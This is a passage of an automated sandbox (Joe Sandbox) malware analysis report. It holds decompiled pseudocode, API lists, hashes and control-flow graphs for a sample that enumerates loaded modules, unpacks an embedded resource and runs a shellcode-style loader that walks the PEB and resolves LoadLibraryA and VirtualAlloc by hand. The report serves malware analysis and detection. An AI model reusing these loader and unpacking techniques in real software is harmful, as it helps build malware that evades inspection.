                            												_t566 = _t557 + 8;
                            												_t549 = _t437;
                            												_t490 = _t566 + 0x298;
                            												while(1) {
                            													_t438 =  *_t490;
                            													__eflags = _t438 -  *_t549;
                            													if(_t438 !=  *_t549) {
                            														break;
                            													}
                            													__eflags = _t438;
                            													if(_t438 == 0) {
                            														L26:
                            														_t438 = 0;
                            													} else {
                            														_t438 =  *((intOrPtr*)(_t490 + 1));
                            														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                            														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                            															break;
                            														} else {
                            															_t490 = _t490 + 2;
                            															_t549 = _t549 + 2;
                            															__eflags = _t438;
                            															if(_t438 != 0) {
                            																continue;
                            															} else {
                            																goto L26;
                            															}
                            														}
                            													}
                            													L28:
                            													__eflags = _t438;
                            													if(_t438 == 0) {
                            														goto L10;
                            													} else {
                            														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                            														_t557 = _t566 + 8;
                            														_t550 = _t439;
                            														_t492 = _t557 + 0x298;
                            														while(1) {
                            															_t440 =  *_t492;
                            															__eflags = _t440 -  *_t550;
                            															if(_t440 !=  *_t550) {
                            																break;
                            															}
                            															__eflags = _t440;
                            															if(_t440 == 0) {
                            																L34:
                            																_t440 = 0;
                            															} else {
                            																_t440 =  *((intOrPtr*)(_t492 + 1));
                            																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                            																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                            																	break;
                            																} else {
                            																	_t492 = _t492 + 2;
                            																	_t550 = _t550 + 2;
                            																	__eflags = _t440;
                            																	if(_t440 != 0) {
                            																		continue;
                            																	} else {
                            																		goto L34;
                            																	}
                            																}
                            															}
                            															L36:
                            															__eflags = _t440;
                            															if(_t440 == 0) {
                            																goto L10;
                            															} else {
                            																goto L37;
                            															}
                            															goto L81;
                            														}
                            														asm("sbb eax, eax");
                            														asm("sbb eax, 0xffffffff");
                            														goto L36;
                            													}
                            													goto L81;
                            												}
                            												asm("sbb eax, eax");
                            												asm("sbb eax, 0xffffffff");
                            												goto L28;
                            												L37:
                            												_t442 = Module32Next(_t525, _t557 + 0x278);
                            												__eflags = _t442;
                            											} while (_t442 != 0);
                            										}
                            										goto L38;
                            									}
                            									goto L81;
                            								}
                            								asm("sbb eax, eax");
                            								asm("sbb eax, 0xffffffff");
                            								goto L18;
                            							} else {
                            								L10:
                            								CloseHandle(_t525);
                            								return 0;
                            							}
                            							goto L81;
                            						}
                            						asm("sbb eax, eax");
                            						asm("sbb eax, 0xffffffff");
                            						goto L9;
                            					}
                            				}
                            				L81:
                            			}

































































































                            0x004019f0
                            0x004019f0
                            0x004019fd
                            0x00401a10
                            0x00401a15
                            0x00401a1a
                            0x00401a1f
                            0x00401a24
                            0x00401a29
                            0x00401a2e
                            0x00401a33
                            0x00401a38
                            0x00401a3d
                            0x00401a42
                            0x00401a47
                            0x00401a4c
                            0x00401a51
                            0x00401a56
                            0x00401a5b
                            0x00401a60
                            0x00401a65
                            0x00401a6a
                            0x00401a6f
                            0x00401a74
                            0x00401a79
                            0x00401a7e
                            0x00401a83
                            0x00401a88
                            0x00401a8d
                            0x00401a92
                            0x00401a97
                            0x00401a9c
                            0x00401aa1
                            0x00401aa6
                            0x00401aab
                            0x00401ab0
                            0x00401ab9
                            0x00401aba
                            0x00401abf
                            0x00401ac7
                            0x0040248d
                            0x0040248d
                            0x00402496
                            0x00401acd
                            0x00401ad6
                            0x00401ae2
                            0x00401ae6
                            0x00401af1
                            0x00401af6
                            0x00401afb
                            0x00401b00
                            0x00401b05
                            0x00401b0a
                            0x00401b0f
                            0x00401b14
                            0x00401b19
                            0x00401b1e
                            0x00401b23
                            0x00401b28
                            0x00401b2d
                            0x00401b32
                            0x00401b37
                            0x00401b3c
                            0x00401b41
                            0x00401b46
                            0x00401b4b
                            0x00401b50
                            0x00401b55
                            0x00401b5a
                            0x00401b5f
                            0x00401b64
                            0x00401b69
                            0x00401b6e
                            0x00401b73
                            0x00401b78
                            0x00401b7d
                            0x00401b85
                            0x00401b8d
                            0x00401b95
                            0x00401b9d
                            0x00401ba4
                            0x00401ba9
                            0x00401bae
                            0x00401bb3
                            0x00401bb8
                            0x00401bbd
                            0x00401bc2
                            0x00401bc7
                            0x00401bcc
                            0x00401bd1
                            0x00401bd6
                            0x00401bdb
                            0x00401be0
                            0x00401be5
                            0x00401bea
                            0x00401bef
                            0x00401bf4
                            0x00401bf9
                            0x00401bfe
                            0x00401c03
                            0x00401c08
                            0x00401c0d
                            0x00401c12
                            0x00401c17
                            0x00401c1c
                            0x00401c21
                            0x00401c26
                            0x00401c2b
                            0x00401c30
                            0x00401c35
                            0x00401c3a
                            0x00401c3f
                            0x00401c44
                            0x00401c48
                            0x00401c4f
                            0x00401dc3
                            0x00401dc4
                            0x00401de0
                            0x00401de2
                            0x00401de7
                            0x00401dec
                            0x00401df1
                            0x00401df6
                            0x00401dfb
                            0x00401e00
                            0x00401e05
                            0x00401e0a
                            0x00401e0f
                            0x00401e14
                            0x00401e19
                            0x00401e1e
                            0x00401e23
                            0x00401e28
                            0x00401e2d
                            0x00401e32
                            0x00401e37
                            0x00401e3c
                            0x00401e41
                            0x00401e46
                            0x00401e4b
                            0x00401e50
                            0x00401e55
                            0x00401e5a
                            0x00401e5f
                            0x00401e64
                            0x00401e69
                            0x00401e6e
                            0x00401e73
                            0x00401e78
                            0x00401e7d
                            0x00401e82
                            0x00401e86
                            0x00401e8b
                            0x00401e96
                            0x00401e9a
                            0x00401ea4
                            0x00401eaf
                            0x00401eba
                            0x00401ebf
                            0x00401ec4
                            0x00401ec6
                            0x00401ecb
                            0x00401ece
                            0x00401ed2
                            0x00401ed4
                            0x00401eef
                            0x00401ed6
                            0x00401edd
                            0x00401ee2
                            0x00401ee6
                            0x00401ee9
                            0x00401ee9
                            0x00401ef7
                            0x00401efc
                            0x00401f02
                            0x00401f08
                            0x00401f0c
                            0x00401f15
                            0x00401f18
                            0x00401f1a
                            0x00401f1c
                            0x00401f22
                            0x00401f22
                            0x00401f24
                            0x00401f28
                            0x00401f2f
                            0x00401f33
                            0x00401f33
                            0x00401f40
                            0x00401f45
                            0x00401f4a
                            0x00401f4b
                            0x00401f50
                            0x00401f58
                            0x00401f58
                            0x00401f58
                            0x00401f58
                            0x00401f33
                            0x00401f63
                            0x00401f63
                            0x00401f69
                            0x00401f72
                            0x00401f72
                            0x00401f72
                            0x00401f73
                            0x00401f75
                            0x00401f7b
                            0x00401f80
                            0x00401f81
                            0x00401f86
                            0x00401f86
                            0x00401f8c
                            0x00401f8d
                            0x00401f8d
                            0x00401f9d
                            0x00401fa2
                            0x00401fa6
                            0x00401fac
                            0x00401faf
                            0x00401fb6
                            0x00401fbf
                            0x00401fc4
                            0x00401fc8
                            0x00401fce
                            0x00401fd3
                            0x00401fe0
                            0x00401fec
                            0x00401ffe
                            0x00402001
                            0x00402006
                            0x0040200b
                            0x00402010
                            0x00402015
                            0x0040201a
                            0x0040201f
                            0x00402024
                            0x00402029
                            0x0040202e
                            0x00402033
                            0x00402038
                            0x0040203d
                            0x00402042
                            0x00402047
                            0x0040204c
                            0x00402051
                            0x00402056
                            0x0040205b
                            0x00402060
                            0x00402065
                            0x0040206a
                            0x0040206f
                            0x00402074
                            0x00402079
                            0x0040207e
                            0x00402083
                            0x00402088
                            0x0040208d
                            0x00402092
                            0x00402097
                            0x0040209c
                            0x004020a1
                            0x004020a5
                            0x004020aa
                            0x004020ae
                            0x004020b4
                            0x004020b6
                            0x004020bb
                            0x004020c0
                            0x004020c5
                            0x004020ca
                            0x004020cf
                            0x004020d4
                            0x004020e1
                            0x004020e6
                            0x004020eb
                            0x004020f0
                            0x004020f5
                            0x004020fa
                            0x004020ff
                            0x00402104
                            0x00402109
                            0x0040210e
                            0x00402113
                            0x00402118
                            0x0040211d
                            0x00402122
                            0x00402127
                            0x0040212c
                            0x00402131
                            0x00402136
                            0x0040213b
                            0x00402140
                            0x00402145
                            0x0040214a
                            0x0040214f
                            0x00402154
                            0x00402159
                            0x0040215e
                            0x00402163
                            0x00402167
                            0x0040216c
                            0x00402171
                            0x00402177
                            0x00402179
                            0x0040217c
                            0x0040217e
                            0x00402183
                            0x00402188
                            0x0040218f
                            0x00402196
                            0x0040219a
                            0x0040219e
                            0x004021a2
                            0x004021a4
                            0x004021bc
                            0x004021be
                            0x004021c0
                            0x004021c6
                            0x004021ca
                            0x004021e5
                            0x004021ec
                            0x004021f1
                            0x00402213
                            0x00402215
                            0x00402217
                            0x0040221d
                            0x00402239
                            0x0040223b
                            0x0040223d
                            0x00402243
                            0x0040224d
                            0x0040224f
                            0x00402251
                            0x00402260
                            0x00402264
                            0x00402269
                            0x00402277
                            0x0040227b
                            0x00402286
                            0x00402293
                            0x004022af
                            0x004022b1
                            0x004022b5
                            0x004022b7
                            0x004022be
                            0x004022be
                            0x004022d7
                            0x004022e8
                            0x004022ef
                            0x004022f6
                            0x00402300
                            0x00402304
                            0x00402308
                            0x00402315
                            0x0040231a
                            0x0040231e
                            0x00402324
                            0x00402328
                            0x0040232a
                            0x00402331
                            0x00402331
                            0x0040234e
                            0x00402350
                            0x00402352
                            0x00402355
                            0x00402355
                            0x0040235b
                            0x0040235f
                            0x00402361
                            0x00402368
                            0x00402368
                            0x0040236d
                            0x00402371
                            0x00402373
                            0x00402375
                            0x0040237b
                            0x0040237b
                            0x00402377
                            0x00402377
                            0x00402377
                            0x00402390
                            0x00402396
                            0x0040239c
                            0x004023a0
                            0x004023a2
                            0x004023a9
                            0x004023a9
                            0x004023ae
                            0x004023b2
                            0x004023b4
                            0x004023ba
                            0x004023ba
                            0x004023b6
                            0x004023b6
                            0x004023b6
                            0x004023ce
                            0x004023d1
                            0x004023d3
                            0x004023dd
                            0x004023ec
                            0x004023ef
                            0x004023fe
                            0x00402401
                            0x00402403
                            0x00402411
                            0x00402417
                            0x00402424
                            0x00402426
                            0x0040242a
                            0x0040242c
                            0x00402434
                            0x00402434
                            0x0040243a
                            0x0040243f
                            0x00402443
                            0x00402445
                            0x0040244d
                            0x0040244d
                            0x00402445
                            0x00402251
                            0x0040223d
                            0x0040244f
                            0x0040245d
                            0x0040245f
                            0x00402461
                            0x00402462
                            0x00402467
                            0x00402467
                            0x0040245f
                            0x004021ca
                            0x0040246a
                            0x0040246e
                            0x00402470
                            0x00402478
                            0x00402478
                            0x0040247a
                            0x0040247e
                            0x00402480
                            0x00402488
                            0x00402488
                            0x00402480
                            0x00000000
                            0x00401c55
                            0x00401c62
                            0x00401c67
                            0x00401c6a
                            0x00401c6c
                            0x00401c73
                            0x00401c73
                            0x00401c77
                            0x00000000
                            0x00000000
                            0x00401c7b
                            0x00401c8f
                            0x00401c8f
                            0x00401c7d
                            0x00401c7d
                            0x00401c83
                            0x00000000
                            0x00401c85
                            0x00401c85
                            0x00401c88
                            0x00401c8d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00401c8d
                            0x00401c83
                            0x00401c98
                            0x00401c9a
                            0x00401cbd
                            0x00401cc2
                            0x00401cc5
                            0x00401cc7
                            0x00401cd0
                            0x00401cd0
                            0x00401cd2
                            0x00401cd4
                            0x00000000
                            0x00000000
                            0x00401cd6
                            0x00401cd8
                            0x00401cec
                            0x00401cec
                            0x00401cda
                            0x00401cda
                            0x00401cdd
                            0x00401ce0
                            0x00000000
                            0x00401ce2
                            0x00401ce2
                            0x00401ce5
                            0x00401ce8
                            0x00401cea
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00401cea
                            0x00401ce0
                            0x00401cf5
                            0x00401cf5
                            0x00401cf7
                            0x00000000
                            0x00401cf9
                            0x00401d02
                            0x00401d07
                            0x00401d09
                            0x00401d10
                            0x00401d1d
                            0x00401d22
                            0x00401d25
                            0x00401d27
                            0x00401d30
                            0x00401d30
                            0x00401d32
                            0x00401d34
                            0x00000000
                            0x00000000
                            0x00401d36
                            0x00401d38
                            0x00401d4c
                            0x00401d4c
                            0x00401d3a
                            0x00401d3a
                            0x00401d3d
                            0x00401d40
                            0x00000000
                            0x00401d42
                            0x00401d42
                            0x00401d45
                            0x00401d48
                            0x00401d4a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00401d4a
                            0x00401d40
                            0x00401d55
                            0x00401d55
                            0x00401d57
                            0x00000000
                            0x00401d5d
                            0x00401d6a
                            0x00401d6f
                            0x00401d72
                            0x00401d74
                            0x00401d80
                            0x00401d80
                            0x00401d82
                            0x00401d84
                            0x00000000
                            0x00000000
                            0x00401d86
                            0x00401d88
                            0x00401d9c
                            0x00401d9c
                            0x00401d8a
                            0x00401d8a
                            0x00401d8d
                            0x00401d90
                            0x00000000
                            0x00401d92
                            0x00401d92
                            0x00401d95
                            0x00401d98
                            0x00401d9a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00401d9a
                            0x00401d90
                            0x00401da5
                            0x00401da5
                            0x00401da7
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00401da7
                            0x00401da0
                            0x00401da2
                            0x00000000
                            0x00401da2
                            0x00000000
                            0x00401d57
                            0x00401d50
                            0x00401d52
                            0x00000000
                            0x00401dad
                            0x00401db6
                            0x00401dbb
                            0x00401dbb
                            0x00401d10
                            0x00000000
                            0x00401d09
                            0x00000000
                            0x00401cf7
                            0x00401cf0
                            0x00401cf2
                            0x00000000
                            0x00401c9c
                            0x00401c9c
                            0x00401c9d
                            0x00401caf
                            0x00401caf
                            0x00000000
                            0x00401c9a
                            0x00401c93
                            0x00401c95
                            0x00000000
                            0x00401c95
                            0x00401c4f
                            0x00000000

                            APIs
                            • OleInitialize.OLE32(00000000), ref: 004019FD
                            • _getenv.LIBCMT ref: 00401ABA
                            • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                            • Module32First.KERNEL32 ref: 00401C48
                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                            • Module32Next.KERNEL32 ref: 00401D02
                            • Module32Next.KERNEL32 ref: 00401DB6
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
                            • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                            • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                            • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                            • LockResource.KERNEL32(00000000), ref: 00401EA7
                            • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                            • _malloc.LIBCMT ref: 00401EBA
                            • _memset.LIBCMT ref: 00401EDD
                            • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                            • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$PPOs$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                            • API String ID: 2366190142-2828641291
                            • Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                            • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                            • Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                            • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 268 66092b-660970 GetPEB 269 660972-660978 268->269 270 66098c-66098e 269->270 271 66097a-66098a call 660d35 269->271 270->269 273 660990 270->273 271->270 276 660992-660994 271->276 275 660996-660998 273->275 277 660a3b-660a3e 275->277 276->275 278 66099d-6609d3 276->278 279 6609dc-6609ee call 660d0c 278->279 282 6609d5-6609d8 279->282 283 6609f0-660a3a 279->283 282->279 283->277
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: .$GetProcAddress.$l
                            • API String ID: 0-2784972518
                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                            • Instruction ID: 0767a01f73073ddf8465d6856b91ef3e7ecdbbdeaa762bea784f0377986859a6
                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                            • Instruction Fuzzy Hash: 2F316CB6900609DFEB10CF99C880AEEBBF6FF48324F24515AD441A7351D771EA45CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 152 66003c-660047 153 66004c-660263 call 660a3f call 660e0f call 660d90 VirtualAlloc 152->153 154 660049 152->154 169 660265-660289 call 660a69 153->169 170 66028b-660292 153->170 154->153 175 6602ce-6603c2 VirtualProtect call 660cce call 660ce7 169->175 172 6602a1-6602b0 170->172 174 6602b2-6602cc 172->174 172->175 174->172 181 6603d1-6603e0 175->181 182 6603e2-660437 call 660ce7 181->182 183 660439-6604b8 VirtualFree 181->183 182->181 184 6605f4-6605fe 183->184 185 6604be-6604cd 183->185 188 660604-66060d 184->188 189 66077f-660789 184->189 187 6604d3-6604dd 185->187 187->184 194 6604e3-660505 LoadLibraryA 187->194 188->189 195 660613-660637 188->195 192 6607a6-6607b0 189->192 193 66078b-6607a3 189->193 196 6607b6-6607cb 192->196 197 66086e-6608be LoadLibraryA 192->197 193->192 198 660517-660520 194->198 199 660507-660515 194->199 200 66063e-660648 195->200 201 6607d2-6607d5 196->201 204 6608c7-6608f9 197->204 202 660526-660547 198->202 199->202 200->189 203 66064e-66065a 200->203 205 6607d7-6607e0 201->205 206 660824-660833 201->206 207 66054d-660550 202->207 203->189 208 660660-66066a 203->208 209 660902-66091d 204->209 210 6608fb-660901 204->210 211 6607e4-660822 205->211 212 6607e2 205->212 216 660839-66083c 206->216 213 660556-66056b 207->213 214 6605e0-6605ef 207->214 215 66067a-660689 208->215 210->209 211->201 212->206 217 66056f-66057a 213->217 218 66056d 213->218 214->187 219 660750-66077a 215->219 220 66068f-6606b2 215->220 216->197 221 66083e-660847 216->221 223 66057c-660599 217->223 224 66059b-6605bb 217->224 218->214 219->200 225 6606b4-6606ed 220->225 226 6606ef-6606fc 220->226 227 66084b-66086c 221->227 228 660849 221->228 235 6605bd-6605db 223->235 224->235 225->226 229 6606fe-660748 226->229 230 66074b 226->230 227->216 228->197 229->230 230->215 235->207
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0066024D
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocVirtual
                            • String ID: cess$kernel32.dll
                            • API String ID: 4275171209-1230238691
                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                            • Instruction ID: 8728a758dab89e9ea64e30a78b4b1ed508de18543e59f78f2a777fecd39c5750
                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                            • Instruction Fuzzy Hash: 91526874A01229DFDB64CF58C985BA9BBB1BF09304F1480E9E94DAB351DB30AE85DF14
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 236 4018f0-4018fa 237 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 236->237 238 4018fc-401900 236->238 241 401940-401949 GetLastError 237->241 242 401996-40199a 237->242 243 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 241->243 244 40198d-40198f 241->244 243->244 244->242 245 401991 call 401030 244->245 245->242
                            C-Code - Quality: 84%
                            			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                            				void* __ebx;
                            				void* __ebp;
                            				signed int _t12;
                            				void* _t21;
                            				int _t25;
                            				void* _t30;
                            				int _t32;
                            				char* _t35;
                            
                            				_t21 = __edx;
                            				_t35 = _a4;
                            				_t17 = __ecx;
                            				if(_t35 != 0) {
                            					_t25 = lstrlenA(_t35) + 1;
                            					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                            					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
                            					asm("sbb esi, esi");
                            					_t30 =  ~_t12 + 1;
                            					if(_t30 != 0) {
                            						_t12 = GetLastError();
                            						if(_t12 == 0x7a) {
                            							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                            							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                            							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                            							asm("sbb esi, esi");
                            							_t30 =  ~_t12 + 1;
                            						}
                            						if(_t30 != 0) {
                            							_t12 = E00401030();
                            						}
                            					}
                            					return _t12;
                            				} else {
                            					 *__ecx = _t35;
                            					return __eax;
                            				}
                            			}











                            0x004018f0
                            0x004018f2
                            0x004018f6
                            0x004018fa
                            0x00401917
                            0x0040191a
                            0x0040192f
                            0x00401939
                            0x0040193b
                            0x0040193e
                            0x00401940
                            0x00401949
                            0x0040195e
                            0x0040196b
                            0x00401980
                            0x0040198a
                            0x0040198c
                            0x0040198c
                            0x0040198f
                            0x00401991
                            0x00401991
                            0x0040198f
                            0x0040199a
                            0x004018fc
                            0x004018fc
                            0x00401900
                            0x00401900

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00401906
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                            • GetLastError.KERNEL32 ref: 00401940
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLastlstrlen
                            • String ID:
                            • API String ID: 3322701435-0
                            • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                            • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                            • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                            • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 249 40af66-40af6e 250 40af7d-40af88 call 40b84d 249->250 253 40af70-40af7b call 40d2e3 250->253 254 40af8a-40af8b 250->254 253->250 257 40af8c-40af98 253->257 258 40afb3-40afca call 40af49 call 40cd39 257->258 259 40af9a-40afb2 call 40aefc call 40d2bd 257->259 259->258
                            C-Code - Quality: 63%
                            			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                            				signed int _v4;
                            				signed int _v16;
                            				signed int _v40;
                            				void* _t14;
                            				signed int _t15;
                            				intOrPtr* _t21;
                            				signed int _t24;
                            				void* _t28;
                            				void* _t39;
                            				void* _t40;
                            				signed int _t42;
                            				void* _t45;
                            				void* _t47;
                            				void* _t51;
                            
                            				_t40 = __edi;
                            				_t28 = __ebx;
                            				_t45 = _t51;
                            				while(1) {
                            					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
                            					if(_t14 != 0) {
                            						break;
                            					}
                            					_t15 = E0040D2E3(_a4);
                            					__eflags = _t15;
                            					if(_t15 == 0) {
                            						__eflags =  *0x423490 & 0x00000001;
                            						if(( *0x423490 & 0x00000001) == 0) {
                            							 *0x423490 =  *0x423490 | 0x00000001;
                            							__eflags =  *0x423490;
                            							E0040AEFC(0x423484);
                            							E0040D2BD( *0x423490, 0x41a704);
                            						}
                            						E0040AF49( &_v16, 0x423484);
                            						E0040CD39( &_v16, 0x420fa4);
                            						asm("int3");
                            						_t47 = _t45;
                            						_push(_t47);
                            						_push(0xc);
                            						_push(0x420ff8);
                            						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                            						_t42 = _v4;
                            						__eflags = _t42;
                            						if(_t42 != 0) {
                            							__eflags =  *0x4250b0 - 3;
                            							if( *0x4250b0 != 3) {
                            								_push(_t42);
                            								goto L16;
                            							} else {
                            								E0040D6E0(_t28, 4);
                            								_v16 = _v16 & 0x00000000;
                            								_t24 = E0040D713(_t42);
                            								_v40 = _t24;
                            								__eflags = _t24;
                            								if(_t24 != 0) {
                            									_push(_t42);
                            									_push(_t24);
                            									E0040D743();
                            								}
                            								_v16 = 0xfffffffe;
                            								_t19 = E0040B70B();
                            								__eflags = _v40;
                            								if(_v40 == 0) {
                            									_push(_v4);
                            									L16:
                            									__eflags = HeapFree( *0x4234b4, 0, ??);
                            									if(__eflags == 0) {
                            										_t21 = E0040BFC1(__eflags);
                            										 *_t21 = E0040BF7F(GetLastError());
                            									}
                            								}
                            							}
                            						}
                            						return E0040E21D(_t19);
                            					} else {
                            						continue;
                            					}
                            					L19:
                            				}
                            				return _t14;
                            				goto L19;
                            			}

















                            0x0040af66
                            0x0040af66
                            0x0040af69
                            0x0040af7d
                            0x0040af80
                            0x0040af88
                            0x00000000
                            0x00000000
                            0x0040af73
                            0x0040af79
                            0x0040af7b
                            0x0040af8c
                            0x0040af98
                            0x0040af9a
                            0x0040af9a
                            0x0040afa3
                            0x0040afad
                            0x0040afb2
                            0x0040afb7
                            0x0040afc5
                            0x0040afca
                            0x0040afd0
                            0x0040aec2
                            0x0040b6b5
                            0x0040b6b7
                            0x0040b6bc
                            0x0040b6c1
                            0x0040b6c4
                            0x0040b6c6
                            0x0040b6c8
                            0x0040b6cf
                            0x0040b714
                            0x00000000
                            0x0040b6d1
                            0x0040b6d3
                            0x0040b6d9
                            0x0040b6de
                            0x0040b6e4
                            0x0040b6e7
                            0x0040b6e9
                            0x0040b6eb
                            0x0040b6ec
                            0x0040b6ed
                            0x0040b6f3
                            0x0040b6f4
                            0x0040b6fb
                            0x0040b700
                            0x0040b704
                            0x0040b706
                            0x0040b715
                            0x0040b723
                            0x0040b725
                            0x0040b727
                            0x0040b73a
                            0x0040b73c
                            0x0040b725
                            0x0040b704
                            0x0040b6cf
                            0x0040b742
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040af7b
                            0x0040af8b
                            0x00000000

                            APIs
                            • _malloc.LIBCMT ref: 0040AF80
                              • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                              • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                              • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                            • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                              • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                            • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                            • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                            • String ID:
                            • API String ID: 1411284514-0
                            • Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                            • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
